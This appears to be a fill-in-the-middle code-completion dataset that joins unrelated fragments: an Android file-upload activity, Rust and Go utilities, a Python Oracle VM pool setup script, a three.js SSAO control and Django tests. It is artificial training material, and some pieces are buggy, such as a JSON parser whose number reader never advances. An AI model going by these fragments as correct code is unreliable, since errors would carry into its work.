private class CancelAction implements DialogInterface.OnClickListener, DialogInterface.OnCancelListener {
@Override
public void onClick(DialogInterface dialog, int which) {
dialog.dismiss();
finish();
}
@Override
public void onCancel(DialogInterface dialog) {
dialog.dismiss();
finish();
}
}
private class ConfirmAction implements DialogInterface.OnClickListener {
private EditText mmmField;
public ConfirmAction(EditText field) {
mmmField = field;
}
@Override
public void onClick(DialogInterface dialog, int which) {
String name = mmmField.getText().toString();
dialog.dismiss();
new EnqueueToFriendTask(name, mmForUri).execute();
finish();
}
}
}
private class EnqueueToFriendTask extends AsyncTask<Void, Void, Throwable> {
private Uri mmUri;
private String mmFriendAddress;
public EnqueueToFriendTask(String friendAddress, Uri uri) {
mmUri = uri;
mmFriendAddress = friendAddress;
}
@Override
public void onPreExecute() {
Toast.makeText(EnqueueActivity.this, "Sending...", Toast.LENGTH_LONG).show();
}
@Override
public Throwable doInBackground(Void... args) {
File tempFile = null;
try {
tempFile = new Cacher().cache();
new Enqueuer(tempFile).enqueue();
return null;
} catch (IOException e) {
Log.e("EA", "Cannot send to remote playlist", e);
return e;
} finally {
if (tempFile != null) {
tempFile.delete();
}
}
}
@Override
public void onPostExecute(Throwable ret) {
if (ret == null) {<|fim▁hole|> }
private class Enqueuer {
private AndroidHttpClient mmmHttpClient;
private File mmmBlob;
public Enqueuer(File blob) {
mmmHttpClient = AndroidHttpClient.newInstance(getUserAgent());
mmmBlob = blob;
}
private String getUserAgent() {
return String.format("%s/%s", getString(R.string.app_name), "0.0.1");
}
public void enqueue() throws IOException {
HttpPost req = new HttpPost(String.format("http://%s", mmFriendAddress));
MultipartEntity entity = new MultipartEntity();
entity.addPart("stream", new FileBody(mmmBlob, "application/octet-stream"));
req.setEntity(entity);
int code = mmmHttpClient.execute(req).getStatusLine().getStatusCode();
Log.d("EA", String.format("posted, code=%d", code));
}
}
private class Cacher {
public File cache() throws IOException {
FileChannel src = null;
FileChannel dest = null;
File destFile = null;
try {
destFile = new File(root(), randomName());
src = new FileInputStream(getContentResolver().openFileDescriptor(mmUri, "r").getFileDescriptor()).getChannel();
dest = new FileOutputStream(destFile).getChannel();
dest.transferFrom(src, 0, Integer.MAX_VALUE);
Log.d("MA", String.format("cached %s as %s", mmUri.toString(), destFile.getName()));
return destFile;
} catch (IOException e) {
Log.e("MA", "cannot cache", e);
destFile.delete();
throw e;
} finally {
if (src != null) {
try {
src.close();
} catch (IOException e) {
}
}
if (dest != null) {
try {
dest.close();
} catch (IOException e) {
}
}
}
}
private String randomName() {
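// Hash 32 random bytes with MD5 and hex-encode the digest to get a practically unique file name.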
byte[] buffer = new byte[32];
new Random().nextBytes(buffer);
StringBuilder sb = new StringBuilder();
try {
for (byte b : MessageDigest.getInstance("MD5").digest(buffer)) {
sb.append(Integer.toHexString(((int)b) & 0xff));
}
return sb.toString();
} catch (NoSuchAlgorithmException e) {
throw new RuntimeException(e);
}
}
private File root() {
return getExternalFilesDir(null);
}
}
}
}<|fim▁end|> | Toast.makeText(EnqueueActivity.this, "Sent to remote playlist.", Toast.LENGTH_SHORT).show();
} else {
Toast.makeText(EnqueueActivity.this, "Cannot send to remote playlist", Toast.LENGTH_SHORT).show();
} |
<|file_name|>mod.rs<|end_file_name|><|fim▁begin|>use num::Integer;<|fim▁hole|>use rand::Rng;
pub mod constants;
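/// Returns a uniformly random boolean (50/50).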
pub fn get_random_bool() -> bool {
let mut rnd = rand::thread_rng();
rnd.gen()
}
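/// Returns a uniformly distributed value in the half-open range [min, max).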
pub fn get_rand_from_range<T>(min: T, max: T) -> T
where T: Integer + SampleUniform {
let mut rnd = rand::thread_rng();
rnd.gen_range(min, max)
}
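/// Returns true with probability `weight`, which is expected to lie in 0.0..=1.0.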
#[allow(dead_code)]
pub fn get_weighted_random(weight: f32) -> bool {
let mut rnd = rand::thread_rng();
rnd.gen::<f32>() < weight
}<|fim▁end|> | use rand::distributions::uniform::SampleUniform; |
<|file_name|>vsphere_session.go<|end_file_name|><|fim▁begin|>// This Source Code Form is subject to the terms of the Mozilla Public
// License, v. 2.0. If a copy of the MPL was not distributed with this
// file, You can obtain one at http://mozilla.org/MPL/2.0/.
package vim
import (
"net/http"
"github.com/cloudescape/govsphere/vim/soap"
)
type VSphereSession struct {
sessionId string
soapClient *soap.Client
ServiceInstance *ServiceInstance
ServiceContent *ServiceContent
UserSession *UserSession
}
// For now, let's only support
// one vSphere session per App
var session *VSphereSession
const (
APIv4_0 string = "urn:vim25/4.0"
APIv4_1 string = "urn:vim25/4.1"
APIv5_0 string = "urn:vim25/5.0"
APIv5_1 string = "urn:vim25/5.1"
APIv5_5 string = "urn:vim25/5.5"
)
func NewVSphereSession(url, user, pass string, ignoreCert bool) *VSphereSession {
// For now, let's only support
// one vSphere session per App
if session != nil {
return session
}
if url == "" {
panic("Server URL is required")
}
objref := &ManagedObjectReference{
Type: "ServiceInstance",
Value: "ServiceInstance",
}
service := &ServiceInstance{
ManagedObject: &ManagedObject{
ManagedObjectReference: objref,
},
}
// Since we do not know the latest version supported by
// the vSphere server yet, we use the oldest possible first.
soapClient := soap.NewClient(url, APIv4_0, ignoreCert)
session = &VSphereSession{
soapClient: soapClient,
}
sc, err := service.RetrieveServiceContent()
if err != nil {
panic(err)
}
version := sc.About.ApiVersion
var apiVersion string
switch version {
default:
apiVersion = APIv5_5
case "4.0":
apiVersion = APIv4_0
case "4.1":
apiVersion = APIv4_1<|fim▁hole|> case "5.0":
apiVersion = APIv5_0
case "5.1":
apiVersion = APIv5_1
case "5.5":
apiVersion = APIv5_5
}
// Now that we know the latest supported API version,
// we can re-create soapClient using such version.
session.soapClient = soap.NewClient(url, apiVersion, ignoreCert)
sc, err = service.RetrieveServiceContent()
if err != nil {
panic(err)
}
userSession, err := sc.SessionManager.Login(user, pass, "")
if err != nil {
panic(err)
}
session.ServiceInstance = service
session.ServiceContent = sc
session.UserSession = userSession
return session
}
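// invoke performs a SOAP call against the vSphere endpoint, attaching the
// cached session cookie and refreshing it from the response cookies.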
func (s *VSphereSession) invoke(request interface{}, response interface{}) error {
// Sets session cookie
var cookie *http.Cookie
if s.sessionId != "" {
cookie = &http.Cookie{
Name: "vmware_soap_session",
Value: s.sessionId,
Secure: true,
HttpOnly: true,
Path: "/",
}
}
cookies, err := s.soapClient.Call(request, response, []*http.Cookie{cookie})
if err != nil {
return err
}
if len(cookies) > 0 {
s.sessionId = cookies[0].Value
}
return nil
}<|fim▁end|> | |
<|file_name|>main.py<|end_file_name|><|fim▁begin|>from snowball.utils import SnowMachine
from snowball.climate import WeatherProbe
# Note: multiline import limits line length
from snowball.water.phases import (
WaterVapor, IceCrystal, SnowFlake
)
def let_it_snow():
"""
Makes it snow, using a SnowMachine when weather doesn't allow it.
Returns a list of SnowFlakes.
Example::
>>> let_it_snow()
The snow machine is broken. No snow today. :/
[]
>>> let_it_snow()
[<snowball.water.phases.SnowFlake object at 0x101dbc210>,
<snowball.water.phases.SnowFlake object at 0x101dbc350>,
<snowball.water.phases.SnowFlake object at 0x101dbc1d0>,
<snowball.water.phases.SnowFlake object at 0x101dbc190>,
<snowball.water.phases.SnowFlake object at 0x101dbc3d0>,
<snowball.water.phases.SnowFlake object at 0x101dbc410>,
<snowball.water.phases.SnowFlake object at 0x101dbc450>,
<snowball.water.phases.SnowFlake object at 0x101dbc390>,<|fim▁hole|>
# Create a WeatherProbe
weather_probe = WeatherProbe()
if weather_probe.temperature < 0 and weather_probe.clouds:
# There's clouds and it's cold enough
# Create necessary components
vapor = WaterVapor()
ice = IceCrystal()
# Start with empty list of flakes
snow_flakes = []
# Now create the snowflakes (xrange(1, 10) yields nine, as in the docstring example)
for counter in xrange(1, 10):
flake = SnowFlake(vapor, ice)
# Add flake to list
snow_flakes.append(flake)
return snow_flakes
else:
# The weather's not right, use the SnowMachine
snow_machine = SnowMachine()
snow_flakes = snow_machine.let_it_snow()
return snow_flakes<|fim▁end|> | <snowball.water.phases.SnowFlake object at 0x101dbc310>]
""" |
<|file_name|>lib.rs<|end_file_name|><|fim▁begin|>#![feature(collections)]
extern crate collections;
pub mod parser {
use collections::fmt::{Formatter, Result};
use std::fmt::Debug;
use collections::str::Chars;
use std::collections::BTreeMap;
use std::string;
pub enum Json {
String(string::String),
Object(self::Object),
Array(self::Array),
U64(u64),
Null
}
pub type Array = Vec<Json>;
pub type Object = BTreeMap<string::String, Json>;
impl Debug for Json {
fn fmt(&self, f: &mut Formatter) -> Result {
match *self {
Json::String(ref string) => String::fmt(string, f),
Json::Object(ref obj) => BTreeMap::fmt(obj, f),
Json::U64(ref int) => Debug::fmt(int, f),
Json::Array(ref ar) => Debug::fmt(ar, f),
_ => panic!("Noooo!")<|fim▁hole|> }
}
}
fn parse_string(it: &mut Chars) -> String {
let mut string = "".to_string();
loop {
match it.next() {
Some('"') => {
break;
},
Some('\\') => { if let Some(esc) = it.next() { string.push(esc); } }, // keep the escaped character; 'continue' alone let an escaped quote terminate the string early
Some(c) => string.push(c),
None => panic!("Reached end of iterator.")
}
}
return string;
}
fn parse_int(it: &Chars, c: char) -> Json {
let mut num_str = c.to_string();
let clo = it.clone();
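// Iterating over a clone leaves the original iterator untouched, so the digits are not consumed here.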
for car in clo.take_while(|a| a.is_digit(10)) {
num_str.push(car);
}
Json::U64(num_str.parse::<u64>().unwrap())
}
fn parse_value(it: &mut Chars) -> Json {
match it.next() {
Some(' ') => parse_value(it),
Some('{') => parse_object(it),
Some('"') => Json::String(parse_string(it)),
Some('[') => parse_array(it),
Some(c) => {
if c.is_digit(10) {
parse_int(it, c)
} else {
Json::Null
}
},
None => Json::Null
}
}
fn parse_array(it: &mut Chars) -> Json {
let mut ar: Array = vec![parse_value(it)];
loop {
match it.next() {
Some(']') => break,
None => break,
Some(',') => ar.push(parse_value(it)),
Some(_) => continue
}
}
Json::Array(ar)
}
fn parse_object(it: &mut Chars) -> Json {
let mut object = BTreeMap::new();
let mut key = "".to_string();
loop {
match it.next() {
Some(':') => {
object.insert(key, parse_value(it));
key = "".to_string();
},
Some('"') => {
key = parse_string(it);
},
Some('}') => break,
Some(_) => continue,
None => break
}
}
Json::Object(object)
}
pub fn parse(json: &str) -> Json {
let mut it = json.chars();
loop {
match it.next() {
Some('{') => return parse_object(&mut it),
_ => return Json::Null
}
}
}
}
#[test]
fn it_works() {
}<|fim▁end|> | |
<|file_name|>repo_pool.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import os, sys, subprocess, socket, fcntl, struct
from socket import gethostname
from xml.dom.minidom import parseString
from xmlrpclib import ServerProxy, Error
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
def is_it_up(host, port):
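# Probe host:port over TCP with a 1 second timeout to check whether the service is reachable.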
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect((host, port))
s.close()
except:
print "host: %s:%s DOWN" % (host, port)
return False
print "host: %s:%s UP" % (host, port)
return True
# hmm master actions don't apply to a slave
master = "192.168.1.161"
port = 8899
user = "oracle"
password = "*******"
auth = "%s:%s" % (user, password)
server = ServerProxy("http://%s:%s" % ("localhost", port))
mserver = ServerProxy("http://%s@%s:%s" % (auth, master, port))
poolNode = True
interface = "c0a80100"
role = 'xen,utility'
hostname = gethostname()
ip = get_ip_address(interface)
poolMembers = []
xserver = server
print "setting up password"
server.update_agent_password(user, password)
if (is_it_up(master, port)):
print "master seems to be up, slaving"
xserver = mserver
else:
print "no master yet, will become master"
# other mechanisms must be used to make interfaces equal...
try:
# pooling related same as primary storage!
poolalias = "Pool 0"
poolid = "0004fb0000020000ba9aaf00ae5e2d73"
poolfsnfsbaseuuid = "7718562d-872f-47a7-b454-8f9cac4ffa3a"
pooluuid = poolid
poolfsuuid = poolid
clusterid = "ba9aaf00ae5e2d72"
mgr = "d1a749d4295041fb99854f52ea4dea97"
poolmvip = master
poolfsnfsbaseuuid = "6824e646-5908-48c9-ba44-bb1a8a778084"
repoid = "6824e646590848c9ba44bb1a8a778084"
poolid = repoid
repo = "/OVS/Repositories/%s" % (repoid)
repomount = "cs-mgmt:/volumes/cs-data/secondary"
# primary
primuuid = "7718562d872f47a7b4548f9cac4ffa3a"
ssuuid = "7718562d-872f-47a7-b454-8f9cac4ffa3a"
fshost = "cs-mgmt"
fstarget = "/volumes/cs-data/primary"
fstype = "nfs"
fsname = "Primary storage"
fsmntpoint = "%s:%s" % (fshost, fstarget)
fsmnt = "/nfsmnt/%s" % (ssuuid)
fsplugin = "oracle.generic.NFSPlugin.GenericNFSPlugin"
# set the basics we require to "operate"
print server.take_ownership(mgr, '')
print server.update_server_roles(role,)
# if we're pooling pool...
if (poolNode == True):
poolCount = 0
pooled = False
# check pooling
try:
poolDom = parseString(xserver.discover_server_pool())
print xserver.discover_server_pool()
for node in poolDom.getElementsByTagName('Server_Pool'):
id = node.getElementsByTagName('Unique_Id')[0].firstChild.nodeValue
alias = node.getElementsByTagName('Pool_Alias')[0].firstChild.nodeValue
mvip = node.getElementsByTagName('Master_Virtual_Ip')[0].firstChild.nodeValue
print "pool: %s, %s, %s" % (id, mvip, alias)
members = node.getElementsByTagName('Member')
for member in members:
poolCount = poolCount + 1
mip = member.getElementsByTagName('Registered_IP')[0].firstChild.nodeValue
print "member: %s" % (mip)
if mip == ip:
pooled = True
else:
poolMembers.append(mip)
except Error, v:
print "no master will become master, %s" % v
if (pooled == False):
# setup the repository
print "setup repo"
print server.mount_repository_fs(repomount, repo)
try:
print "adding repo"
print server.add_repository(repomount, repo)
except Error, v:
print "will create the repo, as it's not there", v
print server.create_repository(repomount, repo, repoid, "repo")
print "not pooled!"
if (poolCount == 0):
print "no pool yet, create it"
# check if a pool exists already if not create
# pool; if one exists, add us to the pool
print "create pool fs"
print server.create_pool_filesystem(
fstype,
"%s/VirtualMachines/" % repomount,
clusterid,
poolfsuuid,
poolfsnfsbaseuuid,
mgr,
pooluuid
)
print "create pool"
print server.create_server_pool(poolalias,
pooluuid,
poolmvip,
poolCount,
hostname,
ip,
role
)
else:
print "join the pool"
print server.join_server_pool(poolalias,
pooluuid,
poolmvip,
poolCount,
hostname,
ip,
role
)<|fim▁hole|> poolMembers.append(ip)
print "mambers for pool: %s" % poolMembers
print xserver.set_pool_member_ip_list(poolMembers)
print server.discover_server_pool()
except Error, v:
print "ERROR", v<|fim▁end|> |
# add member to ip list ? |
<|file_name|>index.js<|end_file_name|><|fim▁begin|>/**
* Copyright (c) 2015-present, Facebook, Inc.
* All rights reserved.
*
* This source code is licensed under the BSD-style license found in the
* LICENSE file in the root directory of this source tree. An additional grant
* of patent rights can be found in the PATENTS file in the same directory.
*/
'use strict';
var COLLECTION_PERIOD = 1000;
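// Queued profiling actions are flushed to the console in batches, at most once per collection period.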
var _endedEvents = Object.create(null);
var _eventStarts = Object.create(null);
var _queuedActions = [];
var _scheduledCollectionTimer = null;
var _uuid = 1;
var _enabled = true;
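// Marks a previously started event as ended and queues it for logging.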
function endEvent(eventId) {
var eventEndTime = Date.now();
if (!_eventStarts[eventId]) {
_throw('event(' + eventId + ') is not a valid event id!');
}
if (_endedEvents[eventId]) {
_throw('event(' + eventId + ') has already ended!');
}
_scheduleAction({
action: 'endEvent',
eventId: eventId,
tstamp: eventEndTime
});
_endedEvents[eventId] = true;
}
function signal(eventName, data) {
var signalTime = Date.now();
if (eventName == null) {
_throw('No event name specified');
}
if (data == null) {
data = null;
}
_scheduleAction({
action: 'signal',
data: data,
eventName: eventName,
tstamp: signalTime
});
}
function startEvent(eventName, data) {
var eventStartTime = Date.now();
if (eventName == null) {
_throw('No event name specified');
}
if (data == null) {
data = null;
}
var eventId = _uuid++;
var action = {
action: 'startEvent',
data: data,
eventId: eventId,
eventName: eventName,
tstamp: eventStartTime,
};
_scheduleAction(action);
_eventStarts[eventId] = action;
return eventId;
}
function disable() {
_enabled = false;
}
function _runCollection() {
/* jshint -W084 */
var action;
while ((action = _queuedActions.shift())) {
_writeAction(action);
}
_scheduledCollectionTimer = null;
}
function _scheduleAction(action) {
_queuedActions.push(action);
if (_scheduledCollectionTimer === null) {
_scheduledCollectionTimer = setTimeout(_runCollection, COLLECTION_PERIOD);
}
}
/**
* This is a utility function that throws an error message.
*
* The only purpose of this utility is to make APIs like
* startEvent/endEvent/signal inlineable in the JIT.
*
* (V8 can't inline functions that statically contain a `throw`, and probably
* won't be adding such a non-trivial optimization anytime soon)
*/
function _throw(msg) {
var err = new Error(msg);
// Strip off the call to _throw()
var stack = err.stack.split('\n');
stack.splice(1, 1);
err.stack = stack.join('\n');
throw err;
}
function _writeAction(action) {
if (!_enabled) {
return;
}
var data = action.data ? ': ' + JSON.stringify(action.data) : '';
var fmtTime = new Date(action.tstamp).toLocaleTimeString();
switch (action.action) {
case 'startEvent':
console.log(
'[' + fmtTime + '] ' +
'<START> ' + action.eventName +
data
);
break;
case 'endEvent':
var startAction = _eventStarts[action.eventId];
var startData = startAction.data ? ': ' + JSON.stringify(startAction.data) : '';
console.log(<|fim▁hole|> '[' + fmtTime + '] ' +
'<END> ' + startAction.eventName +
'(' + (action.tstamp - startAction.tstamp) + 'ms)' +
startData
);
delete _eventStarts[action.eventId];
break;
case 'signal':
console.log(
'[' + fmtTime + '] ' +
' ' + action.eventName + '' +
data
);
break;
default:
_throw('Unexpected scheduled action type: ' + action.action);
}
}
exports.endEvent = endEvent;
exports.signal = signal;
exports.startEvent = startEvent;
exports.disable = disable;<|fim▁end|> | |
<|file_name|>test_utils.py<|end_file_name|><|fim▁begin|>from datetime import datetime
import listenbrainz_spark.stats.utils as stats_utils
from listenbrainz_spark.path import LISTENBRAINZ_DATA_DIRECTORY
from listenbrainz_spark import utils
from listenbrainz_spark.tests import SparkTestCase
from listenbrainz_spark.stats import offset_months, offset_days
from pyspark.sql import Row
class UtilsTestCase(SparkTestCase):
# use path_ as prefix for all paths in this class.
path_ = LISTENBRAINZ_DATA_DIRECTORY
def tearDown(self):
path_found = utils.path_exists(self.path_)
if path_found:
utils.delete_dir(self.path_, recursive=True)
def test_get_latest_listen_ts(self):
date = datetime(2020, 5, 18)
df = utils.create_dataframe(Row(listened_at=date), schema=None)
df = df.union(utils.create_dataframe(Row(listened_at=offset_days(date, 7)), schema=None))
utils.save_parquet(df, '{}/2020/5.parquet'.format(self.path_))
result = stats_utils.get_latest_listen_ts()
self.assertEqual(date, result)
def test_filter_listens(self):
from_date = datetime(2020, 5, 1)
to_date = datetime(2020, 5, 31)
df = utils.create_dataframe(Row(listened_at=offset_months(from_date, 1)), None)
df = df.union(utils.create_dataframe(Row(listened_at=offset_months(to_date, 1, shift_backwards=False)), None))
df = df.union(utils.create_dataframe(Row(listened_at=offset_days(from_date, 5, shift_backwards=False)), None))
df = df.union(utils.create_dataframe(Row(listened_at=offset_days(to_date, 5)), None))
result = stats_utils.filter_listens(df, from_date, to_date)
rows = result.collect()
<|fim▁hole|> date = datetime(2020, 5, 19)
self.assertEqual(datetime(2020, 5, 18), stats_utils.get_last_monday(date))<|fim▁end|> | self.assertEqual(rows[0]['listened_at'], offset_days(from_date, 5, shift_backwards=False))
self.assertEqual(rows[1]['listened_at'], offset_days(to_date, 5))
def test_get_last_monday(self): |
<|file_name|>SSAO.js<|end_file_name|><|fim▁begin|>/**
* This Control enables to render a Scene with a Screen Space Ambient Occlusion (SSAO) effect.
*
* @namespace GIScene
* @class Control.SSAO
* @constructor
* @extends GIScene.Control
*/
GIScene.Control.SSAO = function() {
//inherit
GIScene.Control.call(this);
var scenePass;
var ssaoEffect;
var fxaaEffect;
var depthTarget;
var depthShader;
var depthUniforms;
var depthMaterial;
var depthCam;
var activeCam;
var updateDepthCam = function() {
// if(depthCam !== undefined && depthCam.parent !== undefined){
// this.scene.camera.remove(depthCam);
// }
//depthCam
activeCam = (this.scene.camera instanceof THREE.CombinedCamera)?
( (this.scene.camera.inPerspectiveMode)? this.scene.camera.cameraP : this.scene.camera.cameraO )
:
this.scene.camera;
depthCam = activeCam.clone();
this.scene.camera.add(depthCam);
// depthCam = new THREE.PerspectiveCamera();
// //POSITION
// depthCam.fov = activeCam.fov;
// depthCam.aspect = activeCam.aspect;
depthCam.near = 0.1;
depthCam.far = 1000;
depthCam.updateProjectionMatrix();
//console.log(depthCam);
//updateSsaoUniforms();//mca
}.bind(this);
var updateSsaoUniforms = function() {
ssaoEffect.uniforms[ 'tDepth' ].value = depthTarget;
ssaoEffect.uniforms[ 'size' ].value.x = this.scene.canvas.width;
ssaoEffect.uniforms[ 'size' ].value.y = this.scene.canvas.height;
ssaoEffect.uniforms[ 'cameraNear' ].value = depthCam.near;
ssaoEffect.uniforms[ 'cameraFar' ].value = depthCam.far;
}.bind(this);
var onBeforeRender = function() {
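// Depth pre-pass: render the scene into depthTarget using the depthRGBA override material.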
// activeCam = (this.scene.camera instanceof THREE.CombinedCamera)?
// ( (this.scene.camera.inPerspectiveMode)? this.scene.camera.cameraP : this.scene.camera.cameraO )
// :
// this.scene.camera;
// activeCam = this.scene.camera.cameraP.clone();
//
this.scene.root.overrideMaterial = depthMaterial;//new THREE.MeshDepthMaterial({blending: THREE.NoBlending});
// activeCam.near = 0.1;
// activeCam.far = 1500;
// activeCam.updateProjectionMatrix();
this.scene.renderer.clearTarget(depthTarget,true, true, false); //color, depth, stencil
this.scene.renderer.render(this.scene.root, depthCam, depthTarget);
// activeCam.near = this.scene.config.near;
// activeCam.far = this.scene.config.far;
// activeCam.updateProjectionMatrix();
this.scene.root.overrideMaterial = null;
//
// this.scene.root.overrideMaterial = null;
}.bind(this);
var onChangedProjection = function(event) {
console.log("chPrj2",activeCam);
updateDepthCam();
};
var onResize = function() {
updateDepthCam();
depthTarget = new THREE.WebGLRenderTarget( this.scene.canvas.width, this.scene.canvas.height, { minFilter: THREE.NearestFilter, magFilter: THREE.NearestFilter, format: THREE.RGBAFormat } );
updateSsaoUniforms();
fxaaEffect.uniforms[ 'resolution' ].value.set( 1 / this.scene.canvas.width, 1 / this.scene.canvas.height );
}.bind(this);
this.activate_ = function() {
if(!this.isActive){
scenePass = new THREE.RenderPass( this.scene.root, this.scene.camera );
ssaoEffect = new THREE.ShaderPass( THREE.SSAOShader );
depthTarget = new THREE.WebGLRenderTarget( this.scene.canvas.width, this.scene.canvas.height, { minFilter: THREE.NearestFilter, magFilter: THREE.NearestFilter, format: THREE.RGBAFormat } );
depthShader = THREE.ShaderLib[ "depthRGBA" ];
depthUniforms = THREE.UniformsUtils.clone( depthShader.uniforms );
depthMaterial = new THREE.ShaderMaterial( { fragmentShader: depthShader.fragmentShader, vertexShader: depthShader.vertexShader, uniforms: depthUniforms } );
depthMaterial.blending = THREE.NoBlending;
this.scene.addEventListener('beforeRender', onBeforeRender);
// function(){
//
// this.scene.root.overrideMaterial = depthMaterial;//new THREE.MeshDepthMaterial({blending: THREE.NoBlending});
// this.scene.camera.cameraP.near = 0.1;
// this.scene.camera.cameraP.far = 1500;
// this.scene.camera.cameraP.updateProjectionMatrix();
// this.scene.renderer.clearTarget(depthTarget,true, true, true);
// this.scene.renderer.render(this.scene.root, this.scene.camera, depthTarget);
//
// this.scene.camera.cameraP.near = this.scene.config.near;
// this.scene.camera.cameraP.far = this.scene.config.far;
// this.scene.camera.cameraP.updateProjectionMatrix();
// this.scene.root.overrideMaterial = null;
//
// }.bind(this)
// );
ssaoEffect.uniforms[ 'tDepth' ].value = depthTarget;
ssaoEffect.uniforms[ 'size' ].value.x = this.scene.canvas.width;
ssaoEffect.uniforms[ 'size' ].value.y = this.scene.canvas.height;
ssaoEffect.uniforms[ 'cameraNear' ].value = this.scene.camera.near;
ssaoEffect.uniforms[ 'cameraFar' ].value = this.scene.camera.far;
ssaoEffect.uniforms[ 'onlyAO' ].value = 1;
ssaoEffect.renderToScreen = true;
this.scene.effectComposer.addPass(scenePass);
this.scene.effectComposer.addPass(ssaoEffect);
}
//call super class method
GIScene.Control.prototype.activate.call(this);
};
this.activate = function() {
if(!this.isActive){
//depth map
depthTarget = new THREE.WebGLRenderTarget( this.scene.canvas.width, this.scene.canvas.height, { minFilter: THREE.NearestFilter, magFilter: THREE.NearestFilter, format: THREE.RGBAFormat } );
depthShader = THREE.ShaderLib[ "depthRGBA" ];
depthUniforms = THREE.UniformsUtils.clone( depthShader.uniforms );
depthMaterial = new THREE.ShaderMaterial( { fragmentShader: depthShader.fragmentShader, vertexShader: depthShader.vertexShader, uniforms: depthUniforms } );
depthMaterial.blending = THREE.NoBlending;
//depthCam
updateDepthCam();<|fim▁hole|> ssaoEffect = new THREE.ShaderPass( THREE.SSAOShader );
fxaaEffect = new THREE.ShaderPass( THREE.FXAAShader );
updateSsaoUniforms();
ssaoEffect.renderToScreen = true;
fxaaEffect.uniforms[ 'resolution' ].value.set( 1 / this.scene.canvas.width, 1 / this.scene.canvas.height );
fxaaEffect.renderToScreen = false;
//add beforeRender Event
this.scene.addEventListener('beforeRender2', onBeforeRender);
//be sure, there are no other passes active
//add passes
this.scene.effectComposer.passes = [scenePass, fxaaEffect, ssaoEffect];
// this.scene.effectComposer.addPass(scenePass);
// this.scene.effectComposer.addPass(ssaoEffect);
//add other events
window.addEventListener('resize', onResize, false);
this.scene.camera.addEventListener('changedProjection', onChangedProjection);
//call super class method
GIScene.Control.prototype.activate.call(this);
}
};
this.deactivate = function() {
if(this.isActive){
//remove passes
this.scene.effectComposer.passes = [];
//remove depthCam
this.scene.camera.remove(depthCam);
//remove Events
this.scene.removeEventListener('beforeRender2', onBeforeRender);
window.removeEventListener('resize', onResize, false);
this.scene.camera.removeEventListener('changedProjection', onChangedProjection);
//call super class method
GIScene.Control.prototype.deactivate.call(this);
}
};
};
GIScene.Control.SSAO.prototype = Object.create(GIScene.Control.prototype);<|fim▁end|> |
//define passes
scenePass = new THREE.RenderPass( this.scene.root, this.scene.camera ); |
<|file_name|>initial_work.py<|end_file_name|><|fim▁begin|><|fim▁hole|>
def start_service():
subprocess.Popen("ipy start_srv.py", stdout=subprocess.PIPE)
return 0
def close_service():
os.system("taskkill /im ipy.exe /f")<|fim▁end|> | import subprocess
import os
|
<|file_name|>_common.py<|end_file_name|><|fim▁begin|>import abc
import random
import fudge
from contextlib import contextmanager
from ..support.models import *
class BackendTestCaseMixin(object):
__metaclass__ = abc.ABCMeta
@abc.abstractproperty # pragma: no cover
def backend_class(self):
"""backend_class = TestThisBackend"""
def __init__(self, *args, **kwargs):
super(BackendTestCaseMixin, self).__init__(*args, **kwargs)
self.backend = self.backend_class()
self.name = "full_page"
basemodel = Foobar()
self.root_model_path = 'layout/%s/%s/' % (
basemodel._meta.app_label,
basemodel._meta.object_name.lower())
@staticmethod
@contextmanager
def model_meta_randomizer(model, attr):
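# Temporarily replace model._meta.<attr> with a random value; the original is restored on exit.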
original = getattr(model._meta, attr)
value = "random_%d" % random.randint(100, 200)
setattr(model._meta, attr, value)
yield value
setattr(model._meta, attr, original)
def test_requires_a_model_instance(self):
with self.assertRaises(TypeError):
self.backend.get_layout_template_name(Foobar, self.name)
def test_returns_proper_path(self):
expected = ['%s%s.html' % (self.root_model_path, self.name)]
result = self.backend.get_layout_template_name(Foobar(), self.name)
self.assertEqual(expected, result)
def test_renderer_can_specify_base_path(self):
model = Foobar()
with fudge.patched_context(self.backend, "base_layout_directory", "different"):
result = self.backend.get_layout_template_name(model, self.name)
expected = ['different/%s/%s/%s.html' % (
model._meta.app_label, model._meta.object_name.lower(), self.name)]
self.assertEqual(expected, result)
def test_missing_file_is_okay(self):
model = Foobar()
file_doesnt_exist = "fake_template"
expected = ['layout/%s/%s/%s.html' % (
model._meta.app_label,
model._meta.object_name.lower(),
file_doesnt_exist)]
result = self.backend.get_layout_template_name(model, file_doesnt_exist)
self.assertEqual(expected, result)
def test_uses_app_label_in_template_name(self):
model = Foobar()
with self.model_meta_randomizer(model, 'app_label') as app_label:
expected = ['layout/%s/%s/%s.html' % (
app_label, model._meta.object_name.lower(), self.name)]
result = self.backend.get_layout_template_name(model, self.name)
self.assertEqual(expected, result)
def test_uses_model_name_in_template_name(self):
model = Foobar()
with self.model_meta_randomizer(model, 'object_name') as object_name:
expected = ['layout/%s/%s/%s.html' % (
model._meta.app_label, object_name, self.name)]
result = self.backend.get_layout_template_name(model, self.name)
self.assertEqual(expected, result)
def test_uses_name_in_template_name(self):
name = "random_%d" % random.randint(100, 200)
expected = ['%s%s.html' % (self.root_model_path, name)]
result = self.backend.get_layout_template_name(Foobar(), name)
self.assertEqual(expected, result)
def test_proper_model_inheritance_order(self):
model = SubFoobar()
model_path = 'layout/%s/%s/' % \
(model._meta.app_label, model._meta.object_name.lower())
expected = [
'%s%s.html' % (model_path, self.name),
'%s%s.html' % (self.root_model_path, self.name)]
result = self.backend.get_layout_template_name(model, self.name)
self.assertEqual(expected, result)
def test_abstract_models_are_used(self):
concrete = ConcreteFoo()
abstract = AbstractFoo()
concrete_path = 'layout/%s/%s/' % \
(concrete._meta.app_label, concrete._meta.object_name.lower())
abstract_path = 'layout/%s/%s/' % \
(abstract._meta.app_label, abstract._meta.object_name.lower())
expected = [
'%s%s.html' % (concrete_path, self.name),
'%s%s.html' % (abstract_path, self.name),
